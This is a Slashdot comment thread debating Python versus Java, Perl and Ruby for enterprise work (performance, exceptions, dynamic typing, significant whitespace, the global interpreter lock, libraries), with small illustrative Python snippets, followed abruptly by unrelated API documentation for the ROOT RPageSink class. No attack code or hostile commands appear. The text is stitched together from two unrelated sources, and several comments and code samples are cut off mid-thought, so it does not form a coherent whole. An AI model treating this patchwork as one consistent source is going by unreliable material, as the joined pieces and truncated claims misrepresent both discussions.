Since the better of these two alternatives is passing the buck upward, it takes a lot of work to get traction -- you can create a facade layer to orchestrate all kinds of low level stuff, but there is a tendency for that low level stuff to bleed through your facade. Modern Java practice (within the last couple of years) has rediscovered the runtime exception -- which works exactly like the Python exception. Hibernate 3, for example, uses runtime exceptions. Personally, I'll rip bleeding strips off the flesh of one of my guys who does something stupid with an exception -- because it's so easy to just wrap it in a runtime exception (we have a wrapper class for this) and rethrow it. Throwing an exception in a tester's face leads to quicker fault discovery than papering it over.
I think the remaining difference is that Python's collections are built into the language, whereas Java only has generic objects, and containers are built using that low level stuff. The result is that Python gets a big win when it comes to providing terse, convenient and easy to read syntax for processing all the elements in a collection. In programming terms, this task is about as common as dirt on a farm, and is a major win for Python.
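The terseness claim is easy to illustrate; a small sketch of the uniform collection syntax:

```python
# Python's built-in collections keep everyday tasks terse, and the
# same membership/iteration syntax works across types.
words = ["spam", "eggs", "spam", "ham"]

# Count occurrences in one pass over the list.
counts = {}
for w in words:
    counts[w] = counts.get(w, 0) + 1

# Filter and transform in a single comprehension.
long_words = [w.upper() for w in words if len(w) > 3]

# "in" reads the same for strings, lists and dicts.
assert "pam" in "spam"
assert "eggs" in words
assert "spam" in counts
```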
I think Groovy may be more the way to go for Java shops looking for a productivity boost. Python has its own set of gotchas. Which is not to say it isn't quite good, but I'm not a big fan of the idea of combining Java and Python.
Good: (Score:5, Funny)
No such thing (Score:5, Funny)
Dude, programming for the enterprise without the pain is like the Passion of the Christ without the crucifixion... It's impossible.
In that case, Perl should fit perfectly.
Re:No such thing (Score:3, Funny)
- The Dread Programmer Roberts.
python performance (Score:4, Interesting)
Re:python performance (Score:5, Insightful)
Also, you can make the shootout say almost anything; for example, if you also factor in the code lines and weight pidigits with a 4x multiplier, Python comes up as the best of the "serverside languages" (Perl, Python, Java, PHP
Re:python performance (Score:5, Interesting)
Actually I tweaked around with the code - but the rules of the game are just wrong. Just look at the fibonacci test. It requires you to do the stuff completely recursively - that's one of the rules. So you not only generate a huge return stack, you also calculate all the fibonacci numbers far too often. This is just braindead. A good requirement would say: "Calculate the nth fibonacci number". A simple solution would be to start from the beginning and not recursively calculate every fibonacci number a bazillion times.
OK, the test description says that its task is to show the performance of recursion. But then they have to find a task where recursion is a merit - not a flaw. Otherwise you could claim your language is best because it has the best performing idle loops [slashdot.org]
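The objection can be made concrete; a sketch of the benchmark's mandated approach next to the obvious one:

```python
def fib_recursive(n):
    # The shootout's required style: exponential time, because every
    # call recomputes the same subproblems.
    if n < 2:
        return n
    return fib_recursive(n - 1) + fib_recursive(n - 2)

def fib_iterative(n):
    # The sane alternative: linear time, constant space.
    a, b = 0, 1
    for _ in range(n):
        a, b = b, a + b
    return a

# Identical answers, wildly different cost: fib_recursive(30) makes
# over a million calls; fib_iterative(30) loops thirty times.
```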
Re:python performance (Score:3, Informative)
But I do understand your point. Different languages have different ways of doing things. The most efficient algorithm in C, for instance, may not directly translate to the most efficient algorithm in Python.
Re:python performance (Score:5, Insightful)
Can you establish that more fully? How is testing say, a recursive-descent parser, going to be a more valid test of recursion than a recursive solution for fibonacci numbers?
Fibonacci is convenient because you get lots of recursive calls while only hitting the stack, and no integer overflow. If you were to use a recursive parser and python ended up slower than the others, you could easily blame it on the non-recursive work you were doing. The fibonacci example allows you to accurately describe the recursive performance without all that other stuff getting in the way.
Re:python performance (Score:5, Insightful)
Re:python performance (Score:4, Insightful)
If you come across a situation where Python is too slow for what you want to do, then Python can work happily enough with libraries programmed in C. If that's still not fast enough, then use a different language. But I suspect that for 95% of all programming tasks, Python is fast enough.
Re:python performance (Score:3, Insightful)
People are expensive.
Writing in powerful languages like Python makes your people more effective. And most enterprise apps are not CPU limited anyway.
Re:python performance (Score:3, Interesting)
Say what? You must be living in a very different world than I. If it's an enterprise app, then it has a few thousand internal users. Multiply a few seconds by a few thousand people by a few times an hour by a few dollars per hour. Performance matters. Middle of last year my company pulled two people off their primary project to add a feature that saved our primary users two mouse clicks. Those 4,000 users now save 3 seconds, 10 times an hour, 8 hours a d
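Back-of-the-envelope, using the figures quoted (the comment is cut off, so the yearly total is left out):

```python
# Aggregate time saved per day by shaving 3 seconds off a frequent
# operation, using the comment's numbers.
users = 4000
seconds_saved = 3
times_per_hour = 10
hours_per_day = 8

seconds_per_day = users * seconds_saved * times_per_hour * hours_per_day
hours_saved_per_day = seconds_per_day / 3600.0  # about 267 person-hours
```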
Re:python performance (Score:3, Funny)
Did a consultant compute that number? [tripod.com]
Re:python performance (Score:5, Insightful)
I was using an example from the real world to point out why 3 seconds matters. In any significant application there will be some processes that are sufficiently complicated that the choice of algorithm or choice of language will lead to a 3 second delta one way or another. There will also be places where adding a UI shortcut will save 3 seconds.
The real world example talks about UI shortcuts that can save those 3 seconds, and Python makes it easier (according to the common wisdom) to add features. Other languages are more performance centric, and make it easy to save those 3 seconds in operation intensive sections of the code.
I wasn't arguing that Python is bad because it's not as performant. I was saying that both CPU performance and UI friendliness are important, so choosing between Python, Ruby, C#, Java, C++, C or any other language on the spectrum is a question of weighing values.
Ferfucksake people, stop trying to be argumentative and start trying to understand what people are saying. We all claim to be so smart, is our only ability with our intelligence to pick nits? Or can we use our intelligence to seek mutual understanding?
I mean, I can see why the media is turning into a bunch of ranting extremists - they're just a mirror reflecting our own horrible image.
Feh.
Re:python performance (Score:5, Informative)
That being said, I am enjoying it. I recently found I was writing a perl program that became unwieldy in its complexity and impossible to maintain. So I converted to python. My reason for doing so was the existence of a nice matlab-like package that let me recycle matlab code and make nice graphs. The syntax in python is cleaner, which lets me do more complex array manipulations in the scientific environment.
On the other hand I note that this syntactic sugar is simply a coating. For example, python implements objects via an underlying hash just the same way perl does. But it hides it from view. Thus you get less flexibility in objects than perl and no real ability to optimize their speed, since the access method is frozen in the syntax.
Other things that trouble me are the seeming incompleteness of many of its metaphors. For example, variables do spring into existence upon assignment but they don't auto-initialize. Thus simple things like counting the occurrence frequency of words in a file become a hassle, since you have to either explicitly initialize every hash key's value to zero, or use one of the slow accessor methods (like .get()) that introduce huge performance penalties. And the method of doing this is different for arrays, hashes, and scalars. Auto-instantiation is somewhat dangerous too, since a typo can now become an error without some means of declaring that a variable name was meant to exist (e.g. the perl "my" statement).
Related to the lack of auto-initialization is the tendency to rely on the crutch of throwing exceptions rather than returning default values or signals that let the programmer decide if it's worth throwing an exception. I find I end up wrapping too many inner loop clauses in "try" statements. If operations that failed simply returned "None" or zero as appropriate, many things could be simplified without any loss of ability to use exceptions properly.
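For what it's worth, later versions of the standard library address the counting complaint directly; a sketch using collections.defaultdict (added in Python 2.5, after this thread):

```python
from collections import defaultdict

words = "the quick brown fox jumps over the lazy dog the end".split()

# The style the poster objects to: an explicit default via .get().
counts = {}
for w in words:
    counts[w] = counts.get(w, 0) + 1

# defaultdict auto-initializes missing keys by calling its factory,
# here int(), i.e. zero -- no explicit default needed.
auto_counts = defaultdict(int)
for w in words:
    auto_counts[w] += 1
```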
Other incomplete features are a lack of consistency on when an intrinsic operation is done in-place or returns the result. For example, .sort() is done in place while .lstrip() is not. While one might wish to argue that space issues can require in-place operations, it would be better to detect when an operation can be done in place from the syntax: a = a.sort() should be done in place; b = a.sort() should not modify "a".
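The in-place/copy split is at least spelled out by the two spellings the language offers:

```python
a = [3, 1, 2]

# list.sort() mutates in place and returns None -- so the
# a = a.sort() idiom the poster wants would actually lose the list.
b = a.sort()

# sorted() (new in Python 2.4) returns a fresh sorted list and
# leaves its argument untouched.
c = [3, 1, 2]
d = sorted(c)
```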
Typecasting also seems to be incomplete. Take for example the casting of strings to integers. Try this: i = int(45.3); i = int('45'); i = int('45.3'). The first two casts work. The last one is an error. Why? I note .atoi() also fails in the same way.
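The behaviour is deliberate -- int() on a string accepts only integer literals -- and the workaround is an explicit two-step conversion:

```python
# int() truncates a float, and parses an integer string...
assert int(45.3) == 45
assert int('45') == 45

# ...but a string containing a float literal raises ValueError.
try:
    int('45.3')
except ValueError:
    failed = True

# The workaround: parse as float first, then truncate.
assert int(float('45.3')) == 45
```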
My final lament about unfinished python is the screaming lack of a decent syntax checker. Too many of its errors occur at runtime. It's weird that it's the low-level syntax of python that seems so unbaked. The high level imports are luxurious indeed and are a major attraction of the language. Having a convenient operation like "shelve" for persistence takes enormous pain out of coding (now if 'shelve' could just use objects rather than only strings for keys it would be complete).
My hope is that someday python will take advantage of the syntactic sugar to implement objects in a faster way under the hood.
All in all I do like python because it's a lot simpler to get the job done than Java or C++. If you know perl then python is useless as a scripting language (sadly pathetic really), but if you don't know perl then python must seem like a fantastic scripting language if you are coming from C++.
Re:python performance (Score:5, Interesting)
If you want a language that's consistently unsurprising and surprisingly efficient, then try ruby. Performance is not a dream, but that's what compiled languages are for. It lacks most of python's inconsistencies and is really quite pleasant to work with. in ruby there are two sort methods, sort and sort!. One does it in place and one returns a new list. (the ! suffix for mutation and ? suffix for predicates is a gem. I'm pretty sure it was stolen from scheme. It really, really helps make your code clearer)
I still find python more practical for large projects, though, because of the large library and potential for rapid development. I generally use python (possibly with C underpinnings) for larger apps and ruby (with its perl heritage) for scripting. Blocks are the greatest when you're dealing with ssh sessions, opening and closing files/database connections, etc. As for perl, I've generally avoided it after a few bad experiences trying to decipher six month old code. I really don't think it has a place when ruby has most of its features and enough of its syntax, along with the slickest object system around short of smalltalk.
seriously mistaken information. try is 24x slower (Score:3, Interesting)
I benched the two pieces of code: (note the slashdot ecode tag removes the proper indentation, but this should be obvious in context)
and then using your suggestion:
timing these shows the try
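The original snippets were lost in formatting; a hedged reconstruction of the kind of comparison described, where every lookup misses and the try version pays full exception overhead (names are illustrative, not the poster's):

```python
import timeit

def count_with_try(words):
    # The exception machinery fires on every new key.
    counts = {}
    for w in words:
        try:
            counts[w] += 1
        except KeyError:
            counts[w] = 1
    return counts

def count_with_get(words):
    # .get() supplies the default without raising.
    counts = {}
    for w in words:
        counts[w] = counts.get(w, 0) + 1
    return counts

# All-unique input: every try raises, the try version's worst case.
unique = [str(i) for i in range(1000)]
t_try = timeit.timeit(lambda: count_with_try(unique), number=100)
t_get = timeit.timeit(lambda: count_with_get(unique), number=100)
```

The exact ratio depends on the hit/miss mix: when most keys already exist, the try version can actually win, because the successful path does no extra work.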
Microsoft's involved? (Score:3, Insightful)
Re:Microsoft's involved? (Score:3, Interesting)
Did anyone else think... (Score:4, Funny)
Re:Did anyone else think... (Score:3, Funny)
Re:Did anyone else think... (Score:3, Funny)
"I wish to complain about this tribble what I purchased not half an hour ago from this very boutique."
...
Toolsets (Score:5, Informative)
I have 6 years of Perl development plus another 8 in C. So, a newcomer to Python (about 2 months now), I have several reactions shaded by that experience:
* Nice syntax: Not perfect, but very passable overall.
* Love the no-brackets: Indentation as a means of delineating code blocks is great; there's no debate over where to put squiggly braces (the 'if test { statement; } stuff;
* Immature toolsets: there are very few mature toolsets yet. We're using SQLObject, which is in version 0.6, as an object-relational-mapper. It's got some limitations and is admittedly not 'enterprise ready'. It's hard to compare it to the Perl DBI, because the DBI is just an interface and doesn't do mapping.
* Lack of CPAN: the single most fantastic "tool" I've found in my programming career (15 years) has been CPAN. Got a problem? Someone has probably already seen it and started a solution. I know this is in the works for Python but the tools are not all there yet.
* Syntax (bad): Lack of a requirement to declare vars before use. I really would like the ability to require that all vars are explicitly declared before being assigned to. It would help coding reliability.
Just my 5 cents.
-- Kevin
Re:Toolsets (Score:3, Insightful)
Re:Toolsets (Score:5, Informative)
Syntax (bad): Lack of a requirement to declare vars before use. I really would like the ability to require that all vars are explicitly declared before being assigned to. it would help coding reliability.
Actually, Guido van Rossum (the creator of Python) is working on optional declaration of variables for a future version of Python. Although some Pythonistas are annoyed, it may give folks like you, Kevin, the best of both worlds. There is discussion on comp.lang.python about this from time to time, but it certainly appears as though Guido may take action soon. ;-)
Ron Stephens
Python Learning Foundation [awaretek.com]
Re:Purpose of dynamic types? (Score:5, Informative)
So you work with objects by interface rather than by type. The interface also does not have to be a complete interface. You can implement as much of the interface as you need for something. I have some objects that are not lists and cannot be used as lists, yet I have implemented enough methods that you can iterate over them like lists and slice them like lists.
This makes many tasks far simpler and encourages more regularity in usage.
How do you check if a substring is in a string, an item in a sequence, a key in a dictionary, etc.? How do you iterate over them? In python it is all the same: if substring in string, if item in seq, if key in dict; and then for character in string, for item in seq, for key in dict, for line in file, etc.
Types are nice, but the types the static compilers have are not the types my apps use. The static type systems just end up costing me more time to develop working apps with than the dynamic typing systems, and you have to test the product anyway.
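A sketch of the partial-interface point: the class name and behaviour here are made up, but the mechanism -- implementing just enough of the sequence protocol -- is standard Python:

```python
class Countdown:
    """Not a list, but iterable and sliceable like one, because it
    implements just enough of the sequence protocol."""
    def __init__(self, start):
        self.start = start

    def __len__(self):
        return self.start

    def __getitem__(self, index):
        # Handle slices by expanding them into individual lookups.
        if isinstance(index, slice):
            return [self[i] for i in range(*index.indices(len(self)))]
        if not 0 <= index < self.start:
            raise IndexError(index)
        return self.start - index

c = Countdown(5)
as_list = [n for n in c]   # iteration falls back on __getitem__
head = c[1:3]              # slicing works too
```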
sigh... how about a real opinion? (Score:5, Insightful)
I've been using python for pretty much anything in my company that isn't web based, and things couldn't be better. There's talk about python being slower, which it is, but most libraries that do important things are just C wrappers anyway, so the speed decrease is negligible as python is just holding the logic. Tk is nice enough, I guess, but I tend to use wxPython. Either way, it gives you cross platform GUIs, which is always a nice thing. Using py2exe even allows you to 'compile' scripts into exe files on win32 machines.
To be absolutely honest though, I can't think of an easier language to learn (I even teach >40 yo women now and then!) or a quicker language to code in. Once you're accustomed to it, the code just flows out, and I've seldom been disappointed by the results. The formatting requirement helps to ensure that your code isn't a disgusting mess that no one can figure out, YMMV.
A quick check on Dice.com (Score:3, Interesting)
Re:A quick check on Dice.com (Score:5, Insightful)
Re:A quick check on Dice.com (Score:3, Interesting)
You can repeat the same ol' tired mantra, over and over, it doesn't make it true.
And I'll even make the logical case showing how it is a *
Re:A quick check on Dice.com (Score:3, Interesting)
If you had checked for python jobs just 2 years ago, I would be amazed if you could find any.
(mono is not an option right now).
Python is able to run on all of these syst
Yes, but what about the GUI - speed no problem (Score:5, Insightful)
Re:Yes, but what about the GUI - speed no problem (Score:5, Insightful)
But overall, I completely agree: the std python distro needs to standardize on wx, get rid of Tk and at least incorporate the win32all distribution in the win32 version (it just too nice to leave out).
My biggest peeve as a long-time pythonista (the newsbot in my sig is 25k+ LOC of pure Python) is the standard library: I can live w/o a CPAN-like repository (although that would rock), but for a language that used to boast that it comes "with batteries included" the std lib has gone downhill in the last few versions: too many overlapping or competing modules (why, why do we need httplib, httplib2 and urllib?? or getopt and optparse? and what are the differences between them?) and not enough attention into polishing the library into the fantastic toolkit that was around the 1.5 or early 2.1 series.
Someone, probably the BDFL, needs to stand up and take obsolete modules *out* of the standard library, so that the better ones can be improved even more, instead of having various tweaks and improvements going into overlapping modules. That's the point of having a *standard* library after all...
I'd rather have a good std lib than function decorators and other exotic language constructs...
agreed--cleanup needed (Score:4, Insightful)
The sys/os split, logical as it may seem to the experienced Python programmer, also confuses Python newbies, as does the fact that string needs to be imported and that re is yet another separate module.
I think Python would do well with a major library cleanup, removing rarely used and duplicated functionality, and improving the quality of the library code that is there.
Furthermore, I think it would help for common string, I/O, OS, and regular expression functionality to be importable either via a single import statement (without name conflicts), or to be simply present in the default namespace.
Re:Yes, but what about the GUI - speed no problem (Score:3, Insightful)
Three barriers to enterprise Python (Score:5, Insightful)
Many programmers, including top ones like Eric Raymond [linuxjournal.com], are so put off by Python's use of whitespace as a block delimiter that they swear never to touch the language. In my case, this lasted for two years. You need to spend twenty minutes learning the language, after which the whitespace stops being a problem and starts looking like one of the many great ideas in the language. The challenge is getting people past their initial disgust enough to try it.
2) Misperceptions about typing. "Getting" dynamic typing is like it was to "get" objects for those of us who were around 15 years ago - it's a basic change in how you think. You'll know when you're there, because you'll see in a flash that Java's static type declarations are not only redundant and painful, but they are also in themselves a key source of brittleness in large programs over time.
3) The youngsters' problem
This is probably the biggest barrier: university CS departments have become nothing but Java training courses. In trying to better prepare grads for actual careers, they have added a lot of basic business teaching, which is good. But they no longer bother to give students a real understanding of actual computer science, sticking instead to a cookbook approach using Java. So young people arrive in enterprise IT shops knowing nothing but Java and thinking they know everything, so they are not open to anything requiring a different intellectual approach.
Re:Three barriers to enterprise Python (Score:3, Insightful)
Re:Three barriers to enterprise Python (Score:3, Informative)
You appear to be confusing static vs dynamic type checking with strong vs weak type checking.
Static type checking occurs at compile time, whether or not the language is strongly or weakly typed. Dynamic type checking occurs at run time, regardless of whether or not the language is strongly or weakly typed.
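Python itself is a handy example of the distinction: dynamically checked, yet strongly typed. A minimal sketch:

```python
# Dynamic: a name can be rebound to a value of any type at runtime.
x = 42
x = "now a string"

# Strong: values do not silently coerce across types. In a weakly
# typed language "1" + 1 might yield "11" or 2; here it's an error.
try:
    "1" + 1
except TypeError:
    mixed_add_failed = True
```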
Disagreement still exists about w
Re:Received wisdom (Score:3, Informative)
Re:Whoa, this is all crazyness. (Score:3, Insightful)
Though the error may be clear and obvious, knowing it the first time the code runs can be too late. I've written code that can only run a few weeks every year (no
Re:Whoa, this is all crazyness. (Score:3, Insightful)
You'll be able to write the code in Python, and the tests, in less time than most statically typed languages. Many would argue that you can write code and tests in any language faster than writing WORKING code without tests... but that starts down a different avenue of discussion.
We will start to see a lot more of it.. (Score:5, Insightful)
It is a great language we use it for everything, web services, linux / win integration, nt services, automation etc.
Only a few tweaks needed (Score:3, Interesting)
Then the newer pythons allow you to import from a zip. That needs polish; there should be a standard way to package a whole app in a zip (just to make it harder to screw up the file distribution). Having a single unit that contains all the needed code is a huge positive; it's just that much harder to screw stuff up.
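Even without extra polish, the zip-import mechanism is usable today; a sketch (the file and module names are made up):

```python
# Build a zip containing a module, put the zip on sys.path, and the
# zipimport machinery makes it importable like any package directory.
import os
import sys
import tempfile
import zipfile

tmp = tempfile.mkdtemp()
zip_path = os.path.join(tmp, "app.zip")
with zipfile.ZipFile(zip_path, "w") as z:
    z.writestr("bundled.py", "MESSAGE = 'hello from the zip'\n")

sys.path.insert(0, zip_path)
import bundled  # resolved from inside app.zip
```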
Then there are people working on compiler speed; really, it isn't as bad as you might think from some of the benchmarks. It can use some improvement, though, and people are working on it.
Why is whitespace significance a good thing? (Score:5, Insightful)
Well, with any other language, if I get a piece of unfamiliar code and have problems reading it due to weird indentation, I just run it through Emacs' indent-region. Can anyone explain to me why this is not just as viable as mandating the indentation policy by embedding it in the language's syntax?
Re:Why is whitespace significance a good thing? (Score:3, Insightful)
As opposed to:
The question is not so much why one should have a language with whitespace significance, but why one should not. Since the vast majority of well-written programs use whitespacing in this manner already, it makes some sense to do away with braces and semi-colons when they're not really needed.
Re:Why is whitespace significance a good thing? (Score:5, Informative)
Whitespace (or more specifically, indentation) significance forces you to make the visual structure of your code match its semantic structure.
Re:Why is whitespace significance a good thing? (Score:3, Insightful)
Java / Python / Ruby (Score:5, Funny)
:-)
(found many places online...)
The trouble with parrots (Score:3, Funny)
Dr. McCoy - - Captain, I wish to register a complaint... Hello? Miss?
Capt. Kirk - - What do you mean, miss?
Dr. McCoy - - Sorry Captain, I have a cold. I wish to make a complaint.
Capt. Kirk - - Not now Bones, we're closing for launch.
Dr. McCoy - - Never mind that, I wish to make a complaint about this tribble that I purchased not half an hour ago from this very bridge.
Capt. Kirk - - Oh yes, the Bajoran Blue. What's wrong with it?
Dr. McCoy - - I'll tell you what's wrong with it. It's dead, Jim, that's what wrong with it.
Python still has severe limits (Score:3, Interesting)
I'm a big fan of Python. I used it almost exclusively before taking my current job. But let's be honest, Python and Java just aren't intended for the same type of applications.
Python's standard library just doesn't have the breadth of Java's. For small apps, the CPython VM is lighter than Sun's JVM, but CPython's VM is lacking several capabilities that I'd consider pretty essential -- chief among them is the ability to return unused memory back to the OS [evanjones.ca]. And for many tasks, CPython is still effectively single-threaded due to its global interpreter lock [python.org]. Java has never suffered from either of these problems. These aren't trivial issues or the result of nitpicking -- they're rather severe limits (which make me seriously question the suitably of Python for enterprise apps, eg. Zope). Of course, once CPython does get decent threading, it's likely that it's GC subsystem will need to be totally rewritten. I apologize if it sounds like I'm beating up on Python. That's not my intent here. I love Python, and I only wish I could stop more people from using Perl
:)
In fairness, it does look like the Python community is trying to address some of these problems. I just read a paper presented last week at PyCon 2005 [python.org] on CPython's memory management. The author is developing some patches to let CPython return unused memory to the OS [python.org] for most object types (except for Number, List and Dictionary). The memory manager still can't defragment its heap, so this isn't a perfect solution. As of a few weeks ago [python.org] it looks like these patches haven't yet been accepted.
Re:Python still has severe limits (Score:3, Insightful)
The memory is only available to other programs after the program exits.
As a result of this, most daemons will re-exec themselves to free up memory for the rest of the system.
At least, that's what I've always heard. Maybe newer versions of the linux kernel are much smarter...
Kill the GIL (Global Interpreter Lock) (Score:5, Interesting)
You see Python has quite good support for threads, but there are a number of operations in the interpreter that are hacked into being thread safe by providing a global lock on the whole interpreter. One of them is reference counts on objects. So everytime I do an assignment, I have to queue for the GIL. This effectively means that I only really run one thread at a time, even if I have multiple CPUs in the box (or soon, multiple cores).
As more and more applications start shifting to multicpu (or multicore boxes) this problem becomes a much more noticable issue.
Kill the GIL.
Available libraries (Score:3, Insightful)
Its main two faults in my mind are:
1. Speed (but this is being worked on, see the Parrot JIT compiler)
2. Memory usage. wxPython especially is an excellent toolkit but a memory HOG.
As far as Java goes, I don't particularly like Java all that much, but one area where it has a definite advantage over Python at the moment is libraries. Not just the standard library, but what add-on libraries are available. Python has a lot, but Java has pretty much everything and the kitchen sink.
For example, I recently worked on a project that needed to display and manipulate SVG graphics. The two requirements are that it be cross-platform, and be done quickly (in just a couple weeks). I originally wanted to use Python but was unable to find a cross-platform SVG rendering library for Python. I came across the Apache Batik [apache.org] toolkit for Java and found that it was exactly what I needed.
Batik is pretty sweet -- you get a swing component that you can plop into an app in about 10 lines of code and boom -- you have one of the most compliant SVG renderers that I've seen to date. Plus it even gives you a DOM interface that will update the graphical view in real-time. As much as I dislike Java in general (even more bloated than Python
Re:before RTFA (Score:2)
Support (Score:2)
Re:Python *is* painful (Score:5, Insightful)
The old K&R style of doing: versus: this is NASTY in the debates it causes and wars people fight over which is 'right' or 'easier'. For those who don't know, Python doesn't use braces, it uses any consistent indent, as in: Very simple. Reduces line count by 1 or 2 and completely removes the religious debate about brace location. I really like this. There's enough problems debating what the code header/copyright/IDENTIFICATION DIVISION (grin) section's going to look like. "I like #####!" "No, I like #-------!!!", "You Suck!" "No, You Suck!" etc.
Don't knock the lack of braces until you try it. it really does make the code look cleaner.
--Kevin
Re:Python *is* painful (Score:5, Insightful)
And who cares about the programmers discussing brace placing styles? They'll surely find other things to discuss about with Python...
Re:Python *is* painful (Score:3, Informative)
Whitespace [dur.ac.uk]
Re:Toenails (Score:4, Insightful)
Ruby will give you dynamic typing without all of the whitespace issues. Given that the two languages compete in (mostly) the same space, why should I go with Python if I don't like it's whitespace issues?
I've seen many cases where thirty minutes of practice gets rid of the problems people have with the whitespace.
But why do I have to adapt to the tool as opposed to the other way around?
Your reaction is just as the OP predicted.
The truth is that whitepace-delimited blocks can be a source of difficult-to-find bugs. It also makes it quite difficult to easily copy n paste code from one place to another. Add to this that it makes Python a very poor language for templating (embedding in HTML for example) and you start to understand why Ruby on Rails is doing so well.
Re:Toenails (Score:4, Insightful)
Re:Better Python-GIS example (Score:3, Informative)
I meant OpenEV on sourceforge.net [sourceforge.net]
Re:Great... but PLEASE allow 'implicit none'! (Score:3, Insightful)
Re:Perl is run by a Christian. (Score:3, Insightful)
why? why does that matter? why should i care whether Alan Turing was gay? why does it matter what religion or faith Larry Wall may or may not follow? | https://tech.slashdot.org/story/05/04/03/0715209/python-moving-into-the-enterprise?sbsrc=thisday | CC-MAIN-2016-40 | refinedweb | 8,550 | 63.09 |
Before we look any further at the CLR metadata, we need a quick diversion to understand how the metadata is actually stored.
Encoding table information
As an example, we’ll have a look at a row in the
TypeDef table. According to the spec, each
TypeDef consists of the following:
- Flags specifying various properties of the class, including visibility.
- The name of the type.
- The namespace of the type.
- What type this type extends.
- The field list of this type.
- The method list of this type.
How is all this data actually represented?
Offset & RID encoding
Most assemblies don’t need to use a 4 byte value to specify heap offsets and RIDs everywhere, however we can’t hard-code every offset and RID to be 2 bytes long as there could conceivably be more than 65535 items in a heap or more than 65535 fields or types defined in an assembly.
So heap offsets and RIDs are only represented in the full 4 bytes if it is required; in the header information at the top of the
#~ stream are 3 bits indicating if the
#Strings,
#GUID, or
#Blob heaps use 2 or 4 bytes (the
#US stream is not accessed from metadata), and the rowcount of each table. If the rowcount for a particular table is greater than 65535 then all RIDs referencing that table throughout the metadata use 4 bytes, else only 2 bytes are used.
Coded tokens
Not every field in a table row references a single predefined table. For example, in the
TypeDef extends field, a type can extend another
TypeDef (a type in the same assembly), a
TypeRef (a type in a different assembly), or a
TypeSpec (an instantiation of a generic type). A token would have to be used to let us specify the table along with the RID. Tokens are always 4 bytes long; again, this is rather wasteful of space. Cutting the RID down to 2 bytes would make each token 3 bytes long, which isn’t really an optimum size for computers to read from memory or disk.
However, every use of a token in the metadata tables can only point to a limited subset of the metadata tables. For the extends field, we only need to be able to specify one of 3 tables, which we can do using 2 bits:
- 0x0:
TypeDef
- 0x1:
TypeRef
- 0x2:
TypeSpec
We could therefore compress the 4-byte token that would otherwise be needed into a coded token of type
TypeDefOrRef. For each type of coded token, the least significant bits encode the table the token points to, and the rest of the bits encode the RID within that table. We can work out whether each type of coded token needs 2 or 4 bytes to represent it by working out whether the maximum RID of every table that the coded token type can point to will fit in the space available.
The space available for the RID depends on the type of coded token; a
TypeOrMethodDef coded token only needs 1 bit to specify the table, leaving 15 bits available for the RID before a 4-byte representation is needed, whereas a
HasCustomAttribute coded token can point to one of 18 different tables, and so needs 5 bits to specify the table, only leaving 11 bits for the RID before 4 bytes are needed to represent that coded token type.
For example, a 2-byte
TypeDefOrRef coded token with the value 0x0321 has the following bit pattern:
The first two bits specify the table –
TypeRef; the other bits specify the RID. Because we’ve used the first two bits, we’ve got to shift everything along two bits:
This gives us a RID of 0xc8. If any one of the
TypeDef,
TypeRef or
TypeSpec tables had more than 16383 rows (2^14 – 1), then 4 bytes would need to be used to represent all
TypeDefOrRef coded tokens throughout the metadata tables.
Lists
The third representation we need to consider is 1-to-many references; each
TypeDef refers to a list of
FieldDef and
MethodDef belonging to that type. If we were to specify every
FieldDef and
MethodDef individually then each
TypeDef would be very large and a variable size, which isn’t ideal.
There is a way of specifying a list of references without explicitly specifying every item; if we order the
MethodDef and
FieldDef tables by the owning type, then the field list and method list in a
TypeDef only have to be a single RID pointing at the first
FieldDef or
MethodDef belonging to that type; the end of the list can be inferred by the field list and method list RIDs of the next row in the
TypeDef table.
Going back to the
TypeDef
If we have a look back at the definition of a
TypeDef, we end up with the following reprensentation for each row:
- Flags – always 4 bytes
- Name – a
#Stringsheap offset.
- Namespace – a
#Stringsheap offset.
- Extends – a
TypeDefOrRefcoded token.
- FieldList – a single RID to the
FieldDeftable.
- MethodList – a single RID to the
MethodDeftable.
So, depending on the number of entries in the heaps and tables within the assembly, the rows in the
TypeDef table can be as small as 14 bytes, or as large as 24 bytes.
Now we’ve had a look at how information is encoded within the metadata tables, in the next post we can see how they are arranged on disk.
Load comments | https://www.red-gate.com/simple-talk/blogs/anatomy-of-a-net-assembly-clr-metadata-2/ | CC-MAIN-2020-29 | refinedweb | 910 | 62.41 |
AstCycleTest is based on the successor information of SgNodes (the same information that is used by the traversals).
It tests such that it allows a preorder traversal to revisit nodes but reports an error if the traversal would run into a cycle. If a cycle is found it reports the list of SgNodes that are part of the cycle to stdout, starting with "CYCLE FOUND: ..." and stops testing. Usage: AstCycleTest t; t.traverse(SgNode* n); // where n is the root node of the subtree to be tested.
Definition at line 35 of file AstTraversal.h.
#include <AstTraversal.h>
determines whether the given sequence l of nodes extended by node creates a cycle the found cycle is returned.
If no cycle is found, the returned list is empty.
In case of a cycle the traversal does not continue to prevent an infinite recursion of the traversal.
Reimplemented from AstPrePostOrderTraversal. | http://rosecompiler.org/ROSE_HTML_Reference/classAstCycleTest.html | CC-MAIN-2018-05 | refinedweb | 148 | 58.18 |
Abstract interface to write data into an ntuple
The page sink takes the list of columns and afterwards a series of page commits and cluster commits. The user is responsible to commit clusters at a consistent point, i.e. when all pages corresponding to data up to the given entry number are committed.
Definition at line 102 of file RPageStorage.hxx.
#include <ROOT/RPageStorage.hxx>
Definition at line 88 of file RPageStorage.cxx.
Definition at line 93 104 of file RPageStorage.cxx.
Finalize the current cluster and create a new one for the following data.
Definition at line 161 of file RPageStorage.cxx.
Finalize the current cluster and the entrire data set.
Definition at line 142 of file RPageStorage.hxx.
Write a page to the storage. The column must have been added before.
Definition at line 148 of file RPageStorage.cxx.
Guess the concrete derived page source from the file name (location)
Definition at line 97 of file RPageStorage.cxx.
Physically creates the storage container to hold the ntuple (e.g., a keys a TFile or an S3 bucket) To do so, Create() calls CreateImpl() after updating the descriptor.
Create() associates column handles to the columns referenced by the model
Definition at line 112 of file RPageStorage.cxx.
Whether the concrete implementation is a sink or a source.
Implements ROOT::Experimental::Detail::RPageStorage.
Definition at line 129 of file RPageStorage.hxx.
Get a new, empty page for the given column that can be filled with up to nElements.
If nElements is zero, the page sink picks an appropriate size.
Implemented in ROOT::Experimental::Detail::RPageSinkFile.
Definition at line 116 of file RPageStorage.hxx.
Definition at line 110 of file RPageStorage.hxx.
Definition at line 109 of file RPageStorage.hxx.
Building the ntuple descriptor while writing is done in the same way for all the storage sink implementations.
Field, column, cluster ids and page indexes per cluster are issued sequentially starting with 0
Definition at line 108 of file RPageStorage.hxx.
Keeps track of the number of elements in the currently open cluster. Indexed by column id.
Definition at line 113 of file RPageStorage.hxx.
Keeps track of the written pages in the currently open cluster. Indexed by column id.
Definition at line 115 of file RPageStorage.hxx.
